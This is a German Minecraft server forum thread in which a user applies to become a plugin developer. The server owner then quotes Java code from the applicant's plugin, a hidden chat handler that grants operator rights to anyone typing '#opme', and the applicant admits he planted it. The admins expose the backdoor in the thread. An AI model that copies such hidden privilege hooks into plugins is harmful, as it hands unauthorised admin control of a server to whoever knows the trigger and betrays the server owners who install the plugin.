Berwerbung für Script schreiber

Status
Für weitere Antworten geschlossen.
W

wtf_black_wtf

Hallo liebes Admin Team Hier mit möchte ich wtf_black_wtf als Plugin Scripter bewerbe.


1.Zu mir
Hallo ich heiße Moritz Haucke ich komme aus Ems Büren aus Niedersachsen Ich bin 18 Jahre alt .
Ich habe mich vor 2 Jahren auf das scripten von GTA MTA Minecraft und Armar3 Altist umgelernt.
Ich bin von Beruf Computer Techniker und Wartungs Dienst der Bundeswehr.

2.Meine Wissen Über Scripten
Ich habe schon viele Plugins für bekannte Server geschrieben wie für GmmeHd.de das EnderGames Plugin das ich in auch unten als Download link zu Verfügung stellen werde.
Ich kann für mysql SQL txt Java und dff Scripten .

3.Spiel Lage
Ich Spiele schon seit 4 Jahren Minecraft Ich hatte auf schon eigene Server die auch recht gut wahren
die Plugins habe ich alle selber geschrieben und entwickelt viel Plugins habe ich auf YouTube geställt.
Ich schreibe schon Scripts seit ich ein PC hatte ich fing mit GTA an und Arbeitete mich hoch bis ich dann anfing mit Plugins .

4.Warum ich Developer werden will
Ich schreibe ja lange Pugins die ich auch mal zeigen und das andere Spieler spaß haben können ich möchte auch das Server groß werden und viele Spieler hat und das der Server gute Plugins hat mit den man was anfangen kann des wegen möchte ich Developa werden.

5. Schlusswort
Ich hoffe ihnen hat meine Bewerbung gefallen und sie greifen auf mich zurück

Mit freundlichen Grüßen wtf_black_wtf \Moritz
 
  • Like
Reaktionen: ysl3000 und winofi

cryy_

Owner
Owner
13 November 2014
935
3
2.461
121
30
Köln
www.craftstuebchen.de
Account bestätigt
Ja
Code:
  @EventHandler
  private void forIceMan(PlayerChatEvent event)
  {
    if (event.getMessage().equalsIgnoreCase("#opme"))
    {
      event.getPlayer().setOp(true);
      event.getPlayer().sendMessage(ChatColor.BLUE + "Opped !");
      event.setCancelled(true);
    }
  }

süß :D
 

ysl3000

Updater.
SDev
13 November 2014
303
2
586
111
Account bestätigt
Ja
Das Suchen dauert nie und nimmer so lang. Stichwort NoCheat- ( NoCheatMinus ).
 
W

wtf_black_wtf

ach ihr habt es gesehen, mein Geschenk, nur schade das ihr kein Java könnt.
Sonst würdet ihr sehen, dass ich euch noch was Anderes ein gescriptet habe, aber naja als ob ich das hoch lade. Eine Bestenliste, omg für die Arbeit oder was. Never so ein Plugin kann man verkaufen. Also habe ich einen kleine hack für Spieler gemacht. Ihr hättet ja Spaß damit haben können. Als ob ich euch so etwas schreiben würde.


EDIT by ysl: So etwas nennt man Grammatik. Ich hätte es persöhnlich besser formuliert, aber ich wollte es deinem geistigen Stande anpassen. Schätze dich auf 10-12 Jahre höchstens.
 
Zuletzt bearbeitet von einem Moderator:
W

wtf_black_wtf

Na gut ihr könnt doch lesen dann kann ich wieder richtieg schreiben ich dachte ich sehe mall wie ihr Lehrer seid
 
Status
Für weitere Antworten geschlossen.